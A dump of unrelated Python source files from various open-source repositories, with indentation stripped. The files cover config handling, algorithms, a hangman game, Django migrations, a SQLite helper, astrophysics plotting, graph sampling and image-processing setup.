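#       upload_to_gyazo(path, access_token="<gyazo token>")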
2,744
src/other/sbl.py
sgherbst/simple-base-lib
1
2024217
import sblc
import os
# set working dir to SBL's dataPath
# fix(later): should do this directly from C++ code
os.chdir( sblc.dataPath() )
# convert a python value to a string value suitable to for SBL commands/configs
def strProc( val ):
valStr = str( val );
if valStr == "False":
valStr = "0"
if valStr == "True":
valStr = "1"
return valStr
# represents an entry in a configuration file
class ConfigEntry:
# basic constructor
def __init__( self, _name, _value, _comment ):
self.name = _name
self.value = _value
self.comment = _comment
# represents a configuration file
class Config:
# basic constructor
def __init__( self ):
self.__dict__[ "_entries" ] = []
# add a config entry
def __setattr__( self, name, value ):
if not name.startswith( "_" ):
found = False
for e in self._entries: # fix(later): use dict (though want to maintain order)
if e.name == name:
e.value = value
found = True
if not found:
self._entries.append( ConfigEntry( name, value, "" ) )
# read a config entry
def __getattr__( self, name ):
if not name.startswith( "_" ):
for e in self._entries: # fix(later): use dict (though want to maintain order)
if e.name == name:
return e.value
raise AttributeError
# create a string version suitable for passing to an SBL command
def __str__( self ):
s = ""
for e in self._entries:
if e.name:
s += e.name + "=" + strProc( e.value ) + " "
return s
# load a configuration file (in SBL format)
def load( self, fileName ):
f = open( fileName, "r" )
if f:
for line in f:
line = line.strip()
# get comments/meta-data
preComment = line
comment = ""
if '[' in line:
split = line.split( '[', 1 )
preComment = split[ 0 ]
comment = "[" + split[ 1 ]
elif '#' in line:
split = line.split( '#', 1 )
preComment = split[ 0 ]
comment = "#" + split[ 1 ]
# get name and value (if any)
name = ""
value = ""
split = preComment.split()
if len( split ) >= 2:
name = split[ 0 ]
value = split[ 1 ]
# append an entry (even for blank lines)
self._entries.append( ConfigEntry( name, value, comment ) )
# save this configuration file (in SBL format)
def save( self, fileName ):
f = open( fileName, "w" )
if f:
for e in self._entries:
if e.name:
f.write( e.name )
f.write( " " )
f.write( strProc( e.value ) )
if e.comment:
f.write( " " )
if e.comment:
f.write( e.comment )
f.write( "\n" )
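# Illustrative usage sketch of Config (attribute names are made up, not from this file):
#   cfg = Config()
#   cfg.frameCount = 10
#   cfg.useGpu = True
#   str(cfg)  -> "frameCount=10 useGpu=1 "   (booleans pass through strProc)
#   cfg.save( "example.conf" )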
# provides a simple interface to SBL commands
class CommandRouter:
# return true if user has requested that the current command stop running
def checkCommandCancel( self ):
return sblc.checkCommandEvents()
# display a message
def disp( self, indent, message ):
sblc.disp( 0, indent, message )
# display a warning
def warning( self, message ):
sblc.disp( 1, 0, message )
# display a fatal error (will terminate program)
def fatalError( self, message ):
sblc.disp( 2, 0, message )
# assume all other method calls are commands; send to SBL C++ command system
def __getattr__( self, name ):
if not name.startswith( "_" ):
def runCommand( *args, **keywords ):
cmdStr = name + " " + " ".join( [strProc( a ) for a in args] )
sblc.execCommand( cmdStr )
return runCommand
else:
raise AttributeError
4,214
aiobot/exceptions/__init__.py
thedyrn/aio-vkbot
2
2023480
from .vk_error import VkError
from .aiobot_error import NoneSessionError
__all__ = [VkError, NoneSessionError]
111
binary-search/python/binary_search.py
abccdabfgc/algorithms-java
16
2023290
#!/usr/bin/env python3
import os, json
def binary_search(key, arr):
lo = 0
hi = len(arr) - 1
while lo <= hi:
        mid = lo + (hi - lo) // 2
if key < arr[mid]:
hi = mid - 1
elif key > arr[mid]:
lo = mid + 1
else:
return mid
return -1
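# Illustrative check (not part of the original file):
#   binary_search(5, [1, 3, 5, 7]) == 2 and binary_search(4, [1, 3, 5, 7]) == -1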
def main():
with open(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'input.json')) as f:
for input in json.load(f):
r = binary_search(input['key'], input['array'])
print('binary_search(%s, %s) => %s' % (input['key'], input['array'], r))
if input['result'] != r:
                raise Exception('failed. expected = %s, actual = %s' % (input['result'], r))
if __name__ == '__main__':
main()
782
test/test_chained_func_call.py
mad-center/bilibili-mad-crawler
0
2023173
def foo(next=True):
print('foo')
return next
def bar():
print('bar')
return False
foo(next=True) and bar()
print('=' * 50)
foo(next=False) and bar()
169
number_terms.py
mvgugaev/Python-Algorit-Stepik
11
2024530
import time
# Task: Given a number 1 <= n <= 10^9, find the maximum number k
# for which n can be represented as a sum of k distinct natural summands.
# Print the number k on the first line and the k summands on the second.
# Input:
# 6
# 120 30
# Output:
# 3
# 1 2 3
# Time: 4.935264587402344e-05 s
def main():
n = int(input())
# Get start time
start = time.time()
result, part = [], 1
while n != 0:
while part * 2 >= n and part != n:
part += 1
result.append(part)
n -= part
part += 1
print(str(len(result)) + '\n' + ' '.join([str(i) for i in result]))
# Show time
print('Time: ', time.time() - start, 's')
if __name__ == "__main__":
main()
737
init_db.py
MardanovTimur/aiochat
0
2024326
from sqlalchemy import create_engine, MetaData
from chatapp.settings import config
from chatapp.models import user, friends
from aiopg.sa.engine import aiopg
DSN = 'postgresql://{user}:{password}@{host}:{port}/{database}'
def create_tables(engine):
""" Initialize the database
"""
meta = MetaData()
meta.create_all(bind=engine, tables=[user, friends])
def sample_data(engine):
""" Creates the sample data in database
"""
conn = engine.connect()
conn.execute(user.insert(), [
{
'username': 'timurmardanov97',
},
{
'username': 'jax02',
},
])
conn.close()
async def init_pg(app):
conf = app['config']['postgres']
engine = await aiopg.sa.create_engine(**conf)
app['db'] = engine
async def close_pg(app):
app['db'].close()
await app['db'].wait_closed()
if __name__ == '__main__':
db_url = DSN.format(**config['postgres'])
engine = create_engine(db_url)
create_tables(engine)
sample_data(engine)
import sqlite3
import os
class Table(object):
def __init__(self, conn, table_name, columns):
"""
columns: list of columns, which is itself a list of:
column name, column SQL type, default value, is index.
First column is always the primary key (never inserted)
"""
object.__init__(self)
self.__name = table_name
self.__conn = conn
self.__identity_column_name = columns[0][0]
self.__insert_column_names = []
# skip the unique column id
for c in columns[1:]:
self.__insert_column_names.append(c[0])
upgrade = False
c = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name=?;", [table_name])
for row in c:
if row[0] == table_name:
upgrade = True
c.close()
if upgrade:
# TODO allow upgrade
pass
else:
col_sql = []
for c in columns:
s = '{0} {1}'.format(c[0], c[1])
if len(c) > 2 and c[2] is not None:
s += ' DEFAULT {0}'.format(c[2])
if len(c) > 3 and c[3] is not None:
s += ' {0}'.format(c[3])
col_sql.append(s)
sql = 'CREATE TABLE {0} ({1})'.format(table_name, ','.join(col_sql))
conn.execute(sql)
conn.commit()
def insert(self, *values):
vs = []
for n in values:
vs.append('?')
c = self.__conn.execute("INSERT INTO {0} ({1}) VALUES ({2})".format(
self.__name, ','.join(self.__insert_column_names), ','.join(vs)
), values)
r = c.lastrowid
c.close()
self.__conn.commit()
return r
def delete_by_id(self, id):
try:
c = self.__conn.execute("DELETE FROM {0} WHERE {1} = ?".format(
self.__name, self.__identity_column_name
), [id])
ret = c.rowcount
c.close()
self.__conn.commit()
return ret > 0
except:
print("PROBLEM with sql: {0}".format(
"DELETE FROM {0} WHERE {1} = ?".format(
self.__name, self.__identity_column_name)
))
raise
def delete_where(self, where_clause, *values):
c = self.__conn.execute('DELETE FROM {0} WHERE {1}'.format(
self.__name, where_clause), values)
ret = c.rowcount
c.close()
self.__conn.commit()
return ret
def close(self):
self.__conn = None
def __del__(self):
self.close()
class TableDef(object):
def __init__(self, name, columns=None):
object.__init__(self)
self.__name = name
self.__columns = []
if columns is not None:
self.__columns.extend(columns)
def with_column(self, name, type, default=None, index=None):
self.__columns.append([name, type, default, index])
return self
@property
def name(self):
return self.__name
@property
def columns(self):
return self.__columns
class Db(object):
def __init__(self, filename, table_defs):
"""
table_defs: list of TableDef instances.
"""
object.__init__(self)
self.__conn = sqlite3.connect(filename)
self.__tables = {}
for td in table_defs:
assert isinstance(td, TableDef)
t = Table(self.__conn, td.name, td.columns)
self.__tables[td.name] = t
def __del__(self):
self.close()
def close(self):
if self.__conn is not None:
self.__conn.close()
self.__conn = None
def query(self, query, *values):
"""
Returns iterable rows.
"""
        # print("DEBUG query: {0} {1}".format(repr(query), repr(values)))
v2 = []
for v in values:
if isinstance(v, str) and '\\' in v:
v = v.replace('\\', '\\\\')
v2.append(v)
c = self.__conn.execute(query, values)
for r in c:
yield r
c.close()
def table(self, name):
return self.__tables[name]
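# Illustrative usage sketch (table and column names are made up, not from this file):
#   defs = [TableDef("notes")
#           .with_column("id", "INTEGER PRIMARY KEY")
#           .with_column("body", "TEXT")]
#   db = Db("example.sqlite", defs)
#   note_id = db.table("notes").insert("hello")   # the primary key column is never inserted
#   rows = list(db.query("SELECT body FROM notes WHERE id = ?", note_id))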
4,232
Dator/dator/wsgi.py
treyfortmuller/barc
191
2024451
"""
WSGI config for ruenoor project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dator.settings")
path = '/home/ubuntu/dator'
if path not in sys.path:
sys.path.append(path)
sys.path.append('/home/ubuntu/dator/dator')
sys.path.append('/home/ubuntu/dist/lib/python2.7/site-packages')
application = get_wsgi_application()
588
plot/plot_spiralwidth.py
dh4gan/tache
5
2024080
# Written 15/1/18 by dh4gan
# Script reads spiralmembers.dat file from spiralfind
# Also reads best fit parameters for each arm
# Then computes distance of particle from arm as a function of radius
import filefinder as ff
import io_tache
import io_spiral
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
npoints = 5000
print 'Select membership file to analyse:'
memberfile = ff.find_local_input_files('*_spiralmembers.dat')
ispiral = input("Which spiral to plot? ")
# Determine eigenvalue file name from memberfile name
eigenfile = memberfile[:-18]
# Read spiralmembers file
print 'Reading spiral membership in file',memberfile
x,y,z,spiralmember = io_spiral.read_spiralmembership(memberfile)
print 'Read ', len(spiralmember), ' elements'
#print spiralmember
# Read best fits (either .chimin or .fitparams)
fitparamfile = eigenfile+'_spirals.chimin'
fitdata = np.genfromtxt(fitparamfile,skiprows=2)
# Find fit parameters for selected arm
a = fitdata[ispiral-1,2]
b = fitdata[ispiral-1,3]
x0 = fitdata[ispiral-1,4]
y0 = fitdata[ispiral-1,5]
xsign = fitdata[ispiral-1,7]
ysign = fitdata[ispiral-1,8]
# Find all elements belonging to that arm
imember = spiralmember[:]==ispiral
x = x[imember]
y = y[imember]
z = z[imember]
xorigin = 0.0
yorigin = 0.0
nmember = len(x)
print 'Found ', nmember, ' members of spiral ', ispiral
# For each element:
# compute r, sepmin (minimum distance from spiral)
# save to arrays
#nmember = 1000
r = np.zeros(nmember)
t = np.zeros(nmember)
sepmin = np.zeros(nmember)
weight = np.zeros(nmember)
for i in range(nmember):
r[i] = io_spiral.separation(xorigin,yorigin,x[i],y[i])
t[i], sepmin[i] = io_spiral.find_minimum_t_logspiral(x[i],y[i],a,b,x0,y0,npoints,xsign=xsign,ysign=ysign)
print i,r[i],t[i], sepmin[i]
tmin = np.amin(t)
tmax = np.amax(t)
weight[:] = 1.0/float(nmember)
print 'Minimum, maximum r: ', np.amin(r), np.amax(r)
print 'Minimum, maximum t: ', tmin, tmax
print 'Generating curve: '
print a,b,x0,y0,xsign,ysign
xspiral, yspiral = io_spiral.generate_logspiral_curve(tmin,tmax,a,b,x0,y0,xsign=xsign,ysign=ysign,npoints=npoints)
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#ax2 = fig1.add_subplot(212)
ax1.set_xlabel('R (kpc)',fontsize=22)
ax1.set_ylabel('Spine Distance (kpc)',fontsize=22)
counts, xbins,ybins, image = ax1.hist2d(r/10.0,sepmin/10.0,bins=20, range=[[1.0,4.0],[0.0,0.1]],normed=False,cmap='rainbow')
#plt.colorbar(image,ax=ax1)
maxcount = counts.max()
print maxcount, np.median(counts)
clevels = [50,70,90,95]
clabels = [str(i)+'%' for i in clevels]
clevels = [np.percentile(counts[np.nonzero(counts)],i) for i in clevels]
print clevels
print clabels
CS= ax1.contour(counts.transpose(),extent=[xbins.min(),xbins.max(),ybins.min(),ybins.max()],colors='white',levels=clevels)
fmt={}
for l,s in zip(CS.levels,clabels):
fmt[l]=s
plt.clabel(CS,fontsize=16,fmt=fmt)
#ax1.hist(sepmin[:100])
#ax2.scatter(x[:100],y[:100])
#ax2.plot(xspiral,yspiral,color='red')
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
ax2.set_ylabel('Relative Frequency',fontsize=22)
ax2.set_xlabel('Spine Distance (kpc)',fontsize=22)
ax2.hist(sepmin/10.0,bins=50, histtype='step', label='all radii', linewidth=2,normed=True)
sepclose = sepmin[np.logical_and(r[:]>=10.0,r[:]<20.0)]
sepfar = sepmin[np.logical_and(r[:]>=20.0,r[:]<30.0)]
ax2.hist(sepclose/10.0, histtype = 'step',label = '$1.0 < r < 2.0 $ kpc',linewidth=2,normed=True)
ax2.hist(sepfar/10.0,histtype = 'step',label = '$2.0 < r < 3.0 $ kpc',linewidth=2,normed=True)
ax2.legend(loc='upper right')
plt.show()
fig1.savefig(eigenfile+'spiral_'+str(ispiral)+'width_vs_r.png')
fig2.savefig(eigenfile+'spiral_'+str(ispiral)+'width1D.png')
3,721
src/exceptionite/tabs/RecommendationsTab.py
girardinsamuel/exceptionite
6
2024367
from ..Tab import Tab
from ..blocks.PackagesUpdates import PackagesUpdates
class RecommendationsTab(Tab):
name = "Recommendations"
id = "recommendations"
icon = "CheckCircleIcon"
advertise_content = True
def __init__(self, handler):
super().__init__(handler)
self.add_blocks(PackagesUpdates)
332
main.py
prehensile/knobtwiddler
0
2022831
import sys, os
import tuning
import rtlfm
# main runloop
rtl = rtlfm.RTLFM()
#while True:
for i in range( 10 ):
# get a tuning
t = tuning.get_next_tuning()
# sample a bit
rtl.sample_frequency(
frequency = t.frequency,
modulation = t.modulation,
duration = 5 * 1000
)
# TODO: detect non-silence
# if not silence
# TODO: sample more
# TODO: detect voice
426
kino/management/__init__.py
DongjunLee/kino-bot
109
2023160
import inspect
import json
from ..functions import Functions
from ..utils.data_handler import DataHandler
from ..utils.data_loader import SkillData
from ..utils.data_loader import FeedData
def register_skills():
skills = inspect.getmembers(Functions, predicate=inspect.isfunction)
del skills[0] # del __init__
print("start register skills")
skill_dict = {}
try:
for k, v in skills:
parsed_doc = parse_doc(v.__doc__)
if parsed_doc is None:
                print(f"{k} skill does not have a doc. Skipping this skill.")
continue
parsed_doc["params"] = list(v.__annotations__.keys())
skill_dict[k] = parsed_doc
except BaseException as e:
print(v.__doc__)
data_handler = DataHandler()
data_handler.write_file("skills.json", skill_dict)
print(f"kino-bot has **{len(skill_dict)}** skills.")
for k, v in skill_dict.items():
print(
f" - {v.get('icon', ':white_small_square: ')}**{k}** : {v.get('description', '')}"
)
def parse_doc(doc_string):
if doc_string is None:
return None
parsed_doc = {}
for line in doc_string.splitlines():
if ":" in line:
line = line.strip()
delimeter_index = line.index(":")
key = line[:delimeter_index]
value = json.loads(line[delimeter_index + 1 :])
parsed_doc[key] = value
return parsed_doc
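# Illustrative docstring format that parse_doc understands (the values must be valid JSON;
# this example is not taken from the original skills):
#     icon: ":memo: "
#     description: "Send a daily summary"
# parse_doc on such a docstring returns {"icon": ":memo: ", "description": "Send a daily summary"}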
def prepare_skill_data():
print("setting skill logs for Skill Predictor ...")
SkillData()
def prepare_feed_data():
print("setting feed and pocket logs for Feed Classifier ...")
FeedData()
1,666
src/CommunityGAN/sampling.py
Bipasha-banerjee/newCGAN
69
2024094
import numpy as np
import multiprocessing
import sys
import pickle
import utils
import random
def choice(samples, weight):
s = np.sum(weight)
target = random.random() * s
for si, wi in zip(samples, weight):
if target < wi:
return si
target -= wi
return si
class Sampling(object):
def __init__(self):
super(Sampling, self).__init__()
self.config = pickle.load(open(sys.argv[1], 'rb'))
self.id2nid = pickle.load(open(self.config.cache_filename_prefix + '.neighbor.pkl', 'rb'))
self.total_motifs = pickle.load(open(self.config.cache_filename_prefix + '.motifs.pkl', 'rb'))
self.theta_g = pickle.load(open(self.config.cache_filename_prefix + '.theta.pkl', 'rb'))
self.args = pickle.load(open(self.config.cache_filename_prefix + '.args.pkl', 'rb'))
# print('load data done', datetime.datetime.now())
def run(self):
cores = self.config.num_threads
motifs, paths = zip(*multiprocessing.Pool(cores).map(self.g_s, self.args))
pickle.dump(motifs, open(self.config.cache_filename_prefix + '.motifs_sampled.pkl', 'wb'))
pickle.dump(paths, open(self.config.cache_filename_prefix + '.paths.pkl', 'wb'))
def g_s(self, args): # for multiprocessing, pass multiple args in one tuple
root, n_sample, only_neg = args
motifs = []
paths = []
for i in range(2 * n_sample):
if len(motifs) >= n_sample:
break
motif = [root]
path = [root]
for j in range(1, self.config.motif_size):
v, p = self.g_v(motif)
if v is None:
break
motif.append(v)
path.extend(p)
if len(set(motif)) < self.config.motif_size:
continue
motif = tuple(sorted(motif))
if only_neg and motif in self.total_motifs:
continue
motifs.append(motif)
paths.append(path)
return motifs, paths
def g_v(self, roots):
g_v_v = self.theta_g[roots[0]].copy()
for nid in roots[1:]:
g_v_v *= self.theta_g[nid]
current_node = roots[-1]
previous_nodes = set()
path = []
is_root = True
while True:
if is_root:
node_neighbor = list({neighbor for root in roots for neighbor in self.id2nid[root]})
else:
node_neighbor = self.id2nid[current_node]
if len(node_neighbor) == 0: # the root node has no neighbor
return None, None
if is_root:
tmp_g = g_v_v
else:
tmp_g = g_v_v * self.theta_g[current_node]
relevance_probability = np.sum(self.theta_g[node_neighbor] * tmp_g, axis=1)
relevance_probability = utils.agm(relevance_probability)
next_node = choice(node_neighbor, relevance_probability) # select next node
if next_node in previous_nodes: # terminating condition
break
previous_nodes.add(current_node)
current_node = next_node
path.append(current_node)
is_root = False
return current_node, path
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python sampling.py config.pkl')
sys.exit(1)  # exit instead of falling through to Sampling() without a config path
s = Sampling()
s.run()
3,424
tadataka/dataset/__init__.py
IshitaTakeshi/Tadataka
54
2024311
from tadataka.dataset.tum_rgbd import TumRgbdDataset
from tadataka.dataset.new_tsukuba import NewTsukubaDataset
from tadataka.dataset.euroc import EurocDataset
160
GRE Hangman/gameplay.py
ntdai95/Personal-Projects
3
2024111
# Importing the colored function for user-friendly display
from termcolor import colored
class LetterPlacer:
def placing_letter_in_word(self, chosen_letter, list_secret_word, list_current_position):
"""Placing the user's guessed letter into the corresponding position among the list of list_current_position and then convert
it to a string to print out to the user the location of his/her choice of guessed letters"""
# Creating an empty list for the indexes where the user's guessed letter is located
indexes = []
# Adding the indexes to the list of indexes where the user's guessed letter is located
for index, letter in enumerate(list_secret_word):
if letter == chosen_letter:
indexes.append(index)
# Change the "_" characters with the user's guessed letter based on its location in the secret word
for index in indexes:
list_current_position[index] = chosen_letter
# Creating an empty string to display the location of the guessed letter for the user
string_current_position = ""
# Adding up the "_" characters with the correctly guessed letters as a string to display to the user
for index in list_current_position:
string_current_position = string_current_position + " " + index
# Print out the location of the guessed letter to the user
print(f"{chosen_letter} is in the word{string_current_position}.")
# Return the updated list of list_current_position with the added guessed letter
return list_current_position
class GuessedWordChecker:
def guess_word_input_validator(self):
"""Asking and checking the user's guessed word"""
# Create a while loop to keep asking for a valid guessed word from the user
while True:
# Asking the user for the guessed word, allowing a mix of uppercase and lowercase letters. The input needs to be uppercased
# so that it can match the uppercased secret word.
guessed_word = input("\nTry and guess the word? ").upper()
# If the user's guessed word is valid, then return it.
if guessed_word.isalpha() == True:
return guessed_word
# If the user's guessed word is not valid (it contains non-alphabetical characters such as numbers or symbols, e.g.
# @, !, etc.), then display the warning message and go back to ask for a new guessed word.
else:
print("Please, guess a real word with alphabetical letters only.")
def guessed_word_is_secret_word(self, guessed_word, secret_word, wrong_guess):
"""Decides if the user's guessed word is the same as the secret word"""
# If the user's guessed word is the same as the secret word, then return the user's guessed word, which will be the same as the
# secret word
if guessed_word == secret_word:
return guessed_word
# If the user's guessed word is not the same as the secret word, then print out the warning message and return the guessed word
# as an empty string
else:
guessed_word = ""
print(f"That is not the word.\nYou still have {wrong_guess} guesses remaining.")
return guessed_word
class LetterChecker:
def letter_validator(self, chosen_letter, guessed_letters):
"""Checking if the user's entered letter is valid or not"""
# Check if the user enters an alphabetical letter or not
if chosen_letter.isalpha() == False:
print("Please, enter an alphabetical letter only!")
# Check if the user enters only 1 letter or not
elif len(list(chosen_letter)) != 1:
print("Please, enter one letter only!")
# Check if the guessed letter has already been guessed before
elif chosen_letter in guessed_letters:
print("You already guessed this letter. Please, choose another letter.")
# If there is no issue with the guessed letter, then return the following message
else:
return "Good letter"
def chosen_letter_in_list_secret_word(self, chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word):
"""Checking if the user's chosen letter is among the list of letters of the secret word"""
# Checking if user input of letter is in the secret word
if chosen_letter in list_secret_word:
# If the chosen letter is in the list of letters of secret word, then place that guessed letter in to its appropriate
# position(s) in the list of letters of secret word with the function of
# placing_letter_in_word()
instance_of_LetterPlacer = LetterPlacer()
list_current_position = instance_of_LetterPlacer.placing_letter_in_word(chosen_letter, list_secret_word, list_current_position)
# If the user has found all of the letters in the secret word, there is no point in asking him/her to guess the
# secret word again
if "_" not in list_current_position:
return wrong_guess, list_current_position, secret_word
else:
instance_of_GuessedWordChecker = GuessedWordChecker()
# Ask the user to enter his/her's guess for the secret word and check if it is valid
guessed_word = instance_of_GuessedWordChecker.guess_word_input_validator()
# Replacing the guessed word with the secret word if the user correctly guessed the word with the function of
# guessed_word_is_secret_word()
guessed_word = instance_of_GuessedWordChecker.guessed_word_is_secret_word(guessed_word, secret_word, wrong_guess)
# If the letter is not in the secret word, then decrease the number of guesses remaining by 1 and print out how many
# guesses remain for the user
else:
wrong_guess -=1
print(f"{chosen_letter} is not in the word.\nYou have {wrong_guess} guesses remaining.")
# Return the updated wrong_guess, list_current_position, guessed_word variables
return wrong_guess, list_current_position, guessed_word
class Gameplay:
def gameplay(self, secret_word, definition_secret_word, list_current_position, list_secret_word, wrong_guess, guessed_letters):
"""Deciding if the user correctly guessed the word or not"""
# Creating a while loop to let the user guess letters until he/she runs out of remaining guesses
while wrong_guess != 0:
# Displaying the definition and the current position of guessed letters in the secret word
print(colored(f"\nDefinition: {definition_secret_word}", "cyan"))
string_current_position = ""
for character in list_current_position:
string_current_position += character + " "
print(colored(f"Word: {string_current_position[:-1]}\n", "cyan"))
# Asking the user for a letter, allowing either an uppercase or lowercase letter. The input needs to be uppercased so
# that it can match the list of uppercased letters from list_secret_word
chosen_letter = input("Guess a letter? ").upper()
# Checking, if the letter is valid with the letter_validator() function
instance_of_LetterChecker = LetterChecker()
letter_validity = instance_of_LetterChecker.letter_validator(chosen_letter, guessed_letters)
# Creating an empty string of guessed word, which will be the secret word if the user guesses it correctly and empty string
# otherwise
guessed_word = ""
# If the user input letter is valid, then move on, otherwise go back and ask a new letter again
if letter_validity == "Good letter":
# Adding the user's valid letter to the list of guessed_letters to later check whether the user guesses the same
# letter again
guessed_letters.append(chosen_letter)
# Checking if the user's guessed letter is among the list of letters of the secret word with the function of
# chosen_letter_in_list_secret_word(). Then, return the number of wrong guesses remaining, the
# list of list_current_position (to display the current standing to the user), and the guessed_word as a secret word if
# the user guesses the word correctly after the guessing correctly the letter is among the letters of the secret word
wrong_guess, list_current_position, guessed_word = instance_of_LetterChecker.chosen_letter_in_list_secret_word(chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word)
# If the user guessed the secret word correctly, then return the guessed word as a secret word
if guessed_word == secret_word:
return guessed_word
# If the user did not guess the secret word correctly and ran out of guesses, then return the guessed word as an empty string
else:
return guessed_word
9,282
tests/test_perl_side_proxy.py
yacchi21/PyPerl5
0
2024379
# -*- coding:utf8 -*-
from __future__ import division, print_function, unicode_literals
import unittest
import perl5
class ProxyTestObject(object):
def __init__(self, attr1):
self._attr1 = attr1
def attr1(self, data=None):
if data is None:
return self._attr1
self._attr1 = data
def proxy_test_func(arg):
return arg
SCRIPT = r"""
use PyPerl5::Proxy qw/ py_get_object /;
use PyPerl5::Boolean qw/ true false /;
sub unit_test {
my $ut = shift;
$ut->assertTrue(1);
$ut->assertFalse(0);
$ut->assertTrue(true);
$ut->assertFalse(false);
$ut->assertEqual([1, true], [1, true]);
}
sub unit_test2 {
my $ut = shift;
my $class = py_get_object("tests.test_perl_side_proxy.ProxyTestObject");
$ut->assertTrue($class->isa("PyPerl5::Proxy"));
my $o = $class->new("TEST");
$ut->assertEqual("TEST", $o->attr1);
$o->attr1("TEST2");
$ut->assertEqual("TEST2", $o->attr1);
}
sub unit_test3 {
my $ut = shift;
my $f = py_get_object("tests.test_perl_side_proxy.proxy_test_func");
my $ret = $f->("call");
$ut->assertEqual("call", $ret);
}
"""
class TestCase(unittest.TestCase):
vm = None
def setUp(self):
self.vm = vm = perl5.VM()
vm.eval(SCRIPT)
def tearDown(self):
self.vm.close()
def test_object_proxy(self):
self.vm.call("unit_test", self)
def test_py_get_object(self):
self.vm.call("unit_test2", self)
def test_function_exec(self):
self.vm.call("unit_test3", self)
if __name__ == '__main__':
unittest.main()
1,618
src/utils/__init__.py
amiiiirrrr/TensorRT_keras_model
1
2024204
#coding: utf-8
from utils.callbacks import CallbackForSegmentation
from utils.imagegen import CroppedImageDataGenerator, get_datagen
from utils.misc import *
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('beekeepers', '0004_survey_unique_together'),
]
operations = [
migrations.CreateModel(
name='AprilSurvey',
fields=[
('survey', models.OneToOneField(related_name='april', primary_key=True, serialize=False, to='beekeepers.Survey')),
('colony_loss_reason', models.TextField(help_text='The most likely causes for colony loss')),
],
),
]
608
dash_berkay/urls.py
efebuyuk/jd_intern_project
1
2024588
from django.urls import path
from . import views
from django.conf.urls import url
urlpatterns = [
path('', views.startapp),
]
131
transaction/tests/models/test_user_tag.py
Arthuchaut/sagittarius_project
0
2024067
import pytest
from user.models import User
from transaction.models import UserTag
class TestUserTag:
'''The UserTag model test class.
'''
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize(
'name, icon', [
('foo', None),
('bar', 'baz'),
pytest.param(None, 'baz', marks=pytest.mark.xfail),
]
)
def test_create(self, lambda_user: User, name: str, icon: str) -> None:
'''Test the user_tag creation.
'''
user_tag: UserTag = UserTag.objects.create(
name=name, icon=icon, user=lambda_user
)
assert user_tag
647
niaaml/fitness/utility.py
musicinmybrain/NiaAML
22
2024406
from niaaml.utilities import Factory
from niaaml.fitness.accuracy import Accuracy
from niaaml.fitness.cohen_kappa import CohenKappa
from niaaml.fitness.precision import Precision
from niaaml.fitness.f1 import F1
__all__ = ["FitnessFactory"]
class FitnessFactory(Factory):
r"""Class with string mappings to fitness class.
Attributes:
_entities (Dict[str, Fitness]): Mapping from strings to fitness classes.
See Also:
* :class:`niaaml.utilities.Factory`
"""
def _set_parameters(self, **kwargs):
r"""Set the parameters/arguments of the factory."""
self._entities = {
"Accuracy": Accuracy,
"Precision": Precision,
"CohenKappa": CohenKappa,
"F1": F1,
}
762
backend/posts/migrations/0002_remove_post_tags.py
a-samir97/medium-clone
0
2024202
# Generated by Django 3.1.3 on 2020-11-21 09:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='tags',
),
]
311
tools/modules/TREX/core/__init__.py
automenta/trex-autonomy
0
2024063
# Import TREX analog classes
from TREX.core.db_core import DbCore,Timeline
from TREX.core.assembly import Assembly,Entity,Rule,Token,Slot,Variable
# Import
from TREX.core.token_network import TokenNetwork
from TREX.core.token_network_filter import TokenNetworkFilter
import itertools
import numpy
import six
from chainer import testing
import chainer.utils
def pooling_patches(dims, ksize, stride, pad, cover_all):
"""Return tuples of slices that indicate pooling patches."""
# Left-top indexes of each pooling patch.
if cover_all:
xss = itertools.product(
*[six.moves.range(-p, d + p - k + s, s)
for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])
else:
xss = itertools.product(
*[six.moves.range(-p, d + p - k + 1, s)
for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])
# Tuples of slices for pooling patches.
return [tuple(slice(max(x, 0), min(x + k, d))
for (x, d, k) in six.moves.zip(xs, dims, ksize))
for xs in xss]
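# --- Illustrative note (added; the parameters below are made up) ---
# For a 1-D input of length 4 with ksize=2, stride=2, pad=0 and cover_all=False,
# pooling_patches((4,), (2,), (2,), (0,), False) returns
# [(slice(0, 2),), (slice(2, 4),)], i.e. one tuple of slices per pooling window.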
def shuffled_linspace(shape, dtype):
size = chainer.utils.size_of_shape(shape)
x = numpy.random.permutation(size) + numpy.random.uniform(0.3, 0.7, size)
x = (2 * x / max(1, size) - 1).astype(dtype)
return x.reshape(shape)
testing.run_module(__name__, __file__)
1,082
tensortools/optimize/__init__.py
klmcguir/tensortools
0
2023168
"""
Optimization routines for CP decompositions
"""
from .optim_utils import FitResult
from .cp_als import cp_als
from .mcp_als import mcp_als
from .ncp_hals import ncp_hals
from .ncp_bcd import ncp_bcd
from .mncp_hals import mncp_hals
237
Python/BGEstimation.py
Prasheel24/background-estimation
0
2022696
# -*- coding: utf-8 -*-
"""Background Estimation with Median Filtering"""
__name__ = "BGEstimation"
__version__ = (1,0)
__author__ = "<NAME> <<EMAIL>>"
_generator_name = __name__ + "-" + ".".join(map(str, __version__))
# Import the required libraries
import numpy as np
import sys, os
try:
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
except:
pass
import cv2
from skimage import data, filters
# Capture the Video for Background Estimation in VideoCapture object
captured_video = cv2.VideoCapture('MorganBridgeFeed.mp4')
# Select 20 frames from the captured_video at random
# CAP_PROP_FRAME_COUNT returns the frame count from the video file
# Product with np.random.uniform with specified size gives
# Random frames from the video of type ndarray
